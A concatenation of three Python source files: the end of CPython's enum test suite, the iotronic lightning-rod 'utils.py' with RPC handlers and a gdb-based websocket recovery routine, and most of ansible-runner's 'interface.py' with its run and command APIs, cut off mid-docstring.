print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
utils.py | # Copyright 2017 MDSLAB - University of Messina
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__author__ = "Nicola Peditto <n.peditto@gmail.com>"
import asyncio
import pkg_resources
from six import moves
from stevedore import extension
from threading import Timer
import os
import psutil
import subprocess
import sys
import threading
import time
import signal
from iotronic_lightningrod.common import utils
from iotronic_lightningrod.config import entry_points_name
from iotronic_lightningrod.modules import Module
from iotronic_lightningrod.modules import utils as lr_utils
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
global connFailureRecovery
connFailureRecovery = None
global gdbPid
gdbPid = None
class Utility(Module.Module):
def __init__(self, board, session):
super(Utility, self).__init__("Utility", board)
self.session = session
def finalize(self):
pass
def restore(self):
pass
async def hello(self, req_id, client_name, message, parameters=None):
rpc_name = utils.getFuncName()
LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
if parameters is not None:
LOG.info(" - " + rpc_name + " parameters: " + str(parameters))
import random
s = random.uniform(0.5, 3.0)
await asyncio.sleep(s)
result = "Hello by board to Conductor " + client_name + \
" that said me " + message + " - Time: " + '%.2f' % s
LOG.info("DEVICE hello result: " + str(result))
return result
async def plug_and_play(self, req_id, new_module, new_class,
parameters=None):
rpc_name = utils.getFuncName()
LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
if parameters is not None:
LOG.info(" - " + rpc_name + " parameters: " + str(parameters))
LOG.info("LR modules loaded:\n\t" + new_module)
# Updating entry_points
with open(entry_points_name, 'a') as entry_points:
entry_points.write(
new_module +
'= iotronic_lightningrod.modules.' + new_module + ':'
+ new_class
)
# Reload entry_points
refresh_stevedore('s4t.modules')
LOG.info("New entry_points loaded!")
# Reading updated entry_points
named_objects = {}
for ep in pkg_resources.iter_entry_points(group='s4t.modules'):
named_objects.update({ep.name: ep.load()})
await named_objects
self.session.disconnect()
return str(named_objects)
async def changeConf(self, req_id, conf, parameters=None):
rpc_name = utils.getFuncName()
LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
if parameters is not None:
LOG.info(" - " + rpc_name + " parameters: " + str(parameters))
await self.board.getConf(conf)
self.board.setUpdateTime()
result = "Board configuration changed!"
LOG.info("PROVISIONING RESULT: " + str(result))
return result
async def destroyNode(self, req_id, conf, parameters=None):
rpc_name = utils.getFuncName()
LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
if parameters is not None:
LOG.info(" - " + rpc_name + " parameters: " + str(parameters))
await self.board.setConf(conf)
result = "Board configuration cleaned!"
LOG.info("DESTROY RESULT: " + str(result))
return result
def refresh_stevedore(namespace=None):
"""Trigger reload of entry points.
Useful to have dynamic loading/unloading of stevedore modules.
"""
# NOTE(sheeprine): pkg_resources doesn't support reload on python3 due to
# defining basestring which is still there on reload hence executing
# python2 related code.
try:
del sys.modules['pkg_resources'].basestring
except AttributeError:
# python2, do nothing
pass
# Force working_set reload
moves.reload_module(sys.modules['pkg_resources'])
# Clear stevedore cache
cache = extension.ExtensionManager.ENTRY_POINT_CACHE
if namespace:
if namespace in cache:
del cache[namespace]
else:
cache.clear()
def LR_restart_delayed(seconds):
try:
if seconds < 3:
seconds = 3
LOG.warning("Lightning-rod restarting in "
+ str(seconds) + " seconds...")
def delayLRrestarting():
time.sleep(seconds)
python = sys.executable
os.execl(python, python, *sys.argv)
threading.Thread(target=delayLRrestarting).start()
except Exception as err:
LOG.error("Lightning-rod restarting error: " + str(err))
def LR_restart():
try:
LOG.warning("Lightning-rod restarting in few seconds...")
python = sys.executable
os.execl(python, python, *sys.argv)
except Exception as err:
LOG.error("Lightning-rod restarting error: " + str(err))
def destroyWampSocket():
LR_PID = os.getpid()
global connFailureRecovery
if connFailureRecovery != None:
LOG.info(
"WAMP Connection Recovery timer: CLEANED."
)
connFailureRecovery.cancel()
def timeout():
LOG.warning("WAMP Connection Recovery timer: EXPIRED")
lr_utils.LR_restart()
def timeoutGDB():
LOG.warning("WAMP Connection Recovery GDB timer: EXPIRED")
global gdbPid
os.kill(gdbPid, signal.SIGKILL)
LOG.warning("WAMP Connection Recovery GDB process: KILLED")
LOG.warning("WAMP Connection Recovery GDB process: LR restarting...")
lr_utils.LR_restart()
connFailureRecovery = Timer(30, timeout)
connFailureRecovery.start()
LOG.warning("WAMP Connection Recovery timer: STARTED")
try:
gdbTimeoutCheck = Timer(30, timeoutGDB)
gdbTimeoutCheck.start()
LOG.debug("WAMP Connection Recovery GDB timer: STARTED")
process = subprocess.Popen(
["gdb", "-p", str(LR_PID)],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
global gdbPid
gdbPid = process.pid
proc = psutil.Process()
conn_list = proc.connections()
proc_msg = "WAMP RECOVERY: " + str(conn_list)
print(proc_msg)
LOG.info(proc_msg)
wamp_conn_set = False
for socks in conn_list:
# print(socks.raddr, socks.fd)
if socks.raddr != ():
# print(socks.raddr.port, socks.fd)
if socks.raddr.port == 8181:
socks_msg = "FD selected: " + str(socks.fd) \
+ " [port " + str(socks.raddr.port) + "]"
print(socks_msg)
LOG.info(socks_msg)
ws_fd = socks.fd
first = b"call ((void(*)()) shutdown)("
fd = str(ws_fd).encode('ascii')
last = b"u,0)\nquit\ny"
commands = b"%s%s%s" % (first, fd, last)
process.communicate(input=commands)[0]
msg = "Websocket-Zombie closed! Restoring..."
LOG.warning(msg)
print(msg)
# WAMP connection found!
wamp_conn_set = True
# LOG.info("WAMP CONNECTION FOUND")
LOG.info(
"WAMP Connection Recovery timer: CANCELLED."
)
connFailureRecovery.cancel()
gdbTimeoutCheck.cancel()
LOG.debug("WAMP Connection Recovery GDB timer: CLEANED")
if wamp_conn_set == False:
LOG.warning("WAMP CONNECTION NOT FOUND: LR restarting...")
# In conn_list there is not the WAMP connection!
lr_utils.LR_restart()
except Exception as e:
LOG.warning("RPC-ALIVE - destroyWampSocket error: " + str(e))
lr_utils.LR_restart()
def get_socket_info(wport):
sock_bundle = "N/A"
try:
for socks in psutil.Process().connections():
if len(socks.raddr) != 0:
if (socks.raddr.port == wport):
lr_net_iface = socks
print("WAMP SOCKET: " + str(lr_net_iface))
dct = psutil.net_if_addrs()
for key in dct.keys():
if isinstance(dct[key], dict) == False:
iface = key
for elem in dct[key]:
ip_addr = elem.address
if ip_addr == str(lr_net_iface.laddr.ip):
for snicaddr in dct[iface]:
if snicaddr.family == 17:
lr_mac = snicaddr.address
sock_bundle = [iface, ip_addr,
lr_mac]
return sock_bundle
return sock_bundle
except Exception as e:
LOG.warning("Error getting socket info " + str(e))
sock_bundle = "N/A"
return sock_bundle
return sock_bundle
|
interface.py | # Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import json
import sys
import threading
import logging
from ansible_runner import output
from ansible_runner.config.runner import RunnerConfig
from ansible_runner.config.command import CommandConfig
from ansible_runner.config.inventory import InventoryConfig
from ansible_runner.config.ansible_cfg import AnsibleCfgConfig
from ansible_runner.config.doc import DocConfig
from ansible_runner.runner import Runner
from ansible_runner.streaming import Transmitter, Worker, Processor
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
santize_json_response
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run() and run_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
# If running via the transmit-worker-process method, we must only extract things as read-only
# inside of one of these commands. That could be either transmit or worker.
if kwargs.get('streamer') not in ('worker', 'process'):
dump_artifacts(kwargs)
if kwargs.get('streamer'):
# undo any full paths that were dumped by dump_artifacts above in the streamer case
private_data_dir = kwargs['private_data_dir']
project_dir = os.path.join(private_data_dir, 'project')
playbook_path = kwargs.get('playbook') or ''
if os.path.isabs(playbook_path) and playbook_path.startswith(project_dir):
kwargs['playbook'] = os.path.relpath(playbook_path, project_dir)
inventory_path = kwargs.get('inventory') or ''
if os.path.isabs(inventory_path) and inventory_path.startswith(private_data_dir):
kwargs['inventory'] = os.path.relpath(inventory_path, private_data_dir)
roles_path = kwargs.get('envvars', {}).get('ANSIBLE_ROLES_PATH') or ''
if os.path.isabs(roles_path) and roles_path.startswith(private_data_dir):
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = os.path.relpath(roles_path, private_data_dir)
debug = kwargs.pop('debug', None)
logfile = kwargs.pop('logfile', None)
if not kwargs.pop("ignore_logging", True):
output.configure()
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
if logfile:
output.set_logfile(logfile)
if kwargs.get("process_isolation", False):
pi_executable = kwargs.get("process_isolation_executable", "podman")
if not check_isolation_executable_installed(pi_executable):
print(f'Unable to find process isolation executable: {pi_executable}')
sys.exit(1)
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
streamer = kwargs.pop('streamer', None)
if streamer:
if streamer == 'transmit':
stream_transmitter = Transmitter(**kwargs)
return stream_transmitter
if streamer == 'worker':
stream_worker = Worker(**kwargs)
return stream_worker
if streamer == 'process':
stream_processor = Processor(event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback,
**kwargs)
return stream_processor
kwargs.pop('_input', None)
kwargs.pop('_output', None)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
:param module_args: The module arguments that will be supplied to ad-hoc mode.
:param host_pattern: The host pattern to match when running in ad-hoc mode.
:param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of:
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
- A list of inventory sources, or an empty list to disable passing inventory
:param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param forks: Control Ansible parallel concurrency
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param timeout: The timeout value in seconds that will be passed to either ``pexpect`` of ``subprocess`` invocation
(based on ``runner_mode`` selected) while executing command. It the timeout is triggered it will force cancel the
execution.
:param streamer: Optionally invoke ansible-runner as one of the steps in the streaming pipeline
:param _input: An optional file or file-like object for use as input in a streaming pipeline
:param _output: An optional file or file-like object for use as output in a streaming pipeline
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param process_isolation: Enable process isolation, using either a container engine (e.g. podman) or a sandbox (e.g. bwrap).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
:param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
:param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
:param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir. (default: None)
:param container_options: List of container options to pass to execution engine.
:param resource_profiling: Enable collection of resource utilization data during playbook execution.
:param resource_profiling_base_cgroup: Name of existing cgroup which will be sub-grouped in order to measure resource utilization (default: ansible-runner)
:param resource_profiling_cpu_poll_interval: Interval (in seconds) between CPU polling for determining CPU usage (default: 0.25)
:param resource_profiling_memory_poll_interval: Interval (in seconds) between memory polling for determining memory usage (default: 0.25)
:param resource_profiling_pid_poll_interval: Interval (in seconds) between polling PID count for determining number of processes used (default: 0.25)
:param resource_profiling_results_dir: Directory where profiling data files should be saved (defaults to profiling_data folder inside private data dir)
:param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
copied to this location which will then be used as the working directory during playbook execution.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param omit_event_data: Omits extra ansible event data from event payload (stdout and event still included)
:param only_failed_event_data: Omits extra ansible event data unless it's a failed event (stdout and event still included)
:param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
value is set to 'True' it will raise 'AnsibleRunnerException' exception,
if set to 'False' it log a debug message and continue execution. Default value is 'False'
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type project_dir: str
:type rotate_artifacts: int
:type timeout: int
:type cmdline: str
:type limit: str
:type forks: int
:type quiet: bool
:type verbosity: int
:type streamer: str
:type _input: file
:type _output: file
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type process_isolation: bool
:type process_isolation_executable: str
:type process_isolation_path: str
:type process_isolation_hide_paths: str or list
:type process_isolation_show_paths: str or list
:type process_isolation_ro_paths: str or list
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type resource_profiling: bool
:type resource_profiling_base_cgroup: str
:type resource_profiling_cpu_poll_interval: float
:type resource_profiling_memory_poll_interval: float
:type resource_profiling_pid_poll_interval: float
:type resource_profiling_results_dir: str
:type directory_isolation_base_path: str
:type fact_cache: str
:type fact_cache_type: str
:type omit_event_data: bool
:type only_failed_event_data: bool
:type check_job_event_data: bool
:returns: A :py:class:`ansible_runner.runner.Runner` object, or a simple object containing `rc` if run remotely
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
def init_command_config(executable_cmd, cmdline_args=None, **kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run_command() and run_command_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run_command`
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rc = CommandConfig(**kwargs)
rc.prepare_run_command(executable_cmd, cmdline_args=cmdline_args)
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run_command(executable_cmd, cmdline_args=None, **kwargs):
'''
Run an (Ansible) commands in the foreground and return a Runner object when complete.
:param executable_cmd: The command to be executed.
:param cmdline_args: A list of arguments to be passed to the executable command.
:param input_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``, it provides the
input file descrption to interact with the sub-process running the command.
:param output_fd: The output file descriptor to stream the output of command execution.
:param error_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``, it provides the
error file descrption to read the error received while executing the command.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. If the value of ``input_fd`` parameter
is set or the executable command is one of ``ansible-config``, ``ansible-doc`` or ``ansible-galaxy``
the default value is set to ``subprocess`` else in other cases it is set to ``pexpect``.
:param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
the work directory within container.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param timeout: The timeout value in seconds that will be passed to either ``pexpect`` of ``subprocess`` invocation
(based on ``runner_mode`` selected) while executing command. It the timeout is triggered it will force cancel the
execution.
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
value is set to 'True' it will raise 'AnsibleRunnerException' exception,
if set to 'False' it log a debug message and continue execution. Default value is 'False'
:type executable_cmd: str
:type cmdline_args: list
:type input_fd: file descriptor
:type output_fd: file descriptor
:type error_fd: file descriptor
:type runner_mode: str
:type host_cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type timeout: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type check_job_event_data: bool
:returns: Returns a tuple of response, error string and return code.
In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
``pexpect`` uses same output descriptor for stdout and stderr.
'''
r = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
r.run()
response = r.stdout.read()
error = r.stderr.read()
return response, error, r.rc
def run_command_async(executable_cmd, cmdline_args=None, **kwargs):
'''
Run an (Ansible) commands in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run_command`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
def init_plugin_docs_config(plugin_names, plugin_type=None, response_format=None,
snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both get_plugin_docs() and get_plugin_docs_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.get_plugin_docs`
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = DocConfig(**kwargs)
rd.prepare_plugin_docs_command(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path)
return Runner(rd, event_handler=event_callback_handler, status_handler=status_callback_handler, artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback, finished_callback=finished_callback)
def get_plugin_docs(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command to get plugin docs in the foreground and return a Runner object when complete.
:param plugin_names: The name of the plugins to get docs.
:param plugin_type: The type of the plugin mentioned in plugins_names. Valid values are ``become``, ``cache``, ``callback``,
``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
``module``, ``strategy``. If the value is not provided it defaults to ``module``.
:param response_format: The output format for response. Valid values can be one of ``json`` or ``human`` and the response
is either json string or plain text in human readable foramt. Default value is ``json``.
:param snippet: Show playbook snippet for specified plugin(s).
:param playbook_dir: This parameter is used to sets the relative path to handle playbook adjacent installed plugins.
:param module_path: This parameter is prepend colon-separated path(s) to module library
(default=~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
the work directory within container.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param timeout: The timeout value in seconds that will be passed to either ``pexpect`` of ``subprocess`` invocation
(based on ``runner_mode`` selected) while executing command. It the timeout is triggered it will force cancel the
execution.
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
value is set to 'True' it will raise 'AnsibleRunnerException' exception,
if set to 'False' it log a debug message and continue execution. Default value is 'False'
:type plugin_names: list
:type plugin_type: str
:type response_format: str
:type snippet: bool
:type playbook_dir: str
:type module_path: str
:type runner_mode: str
:type host_cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
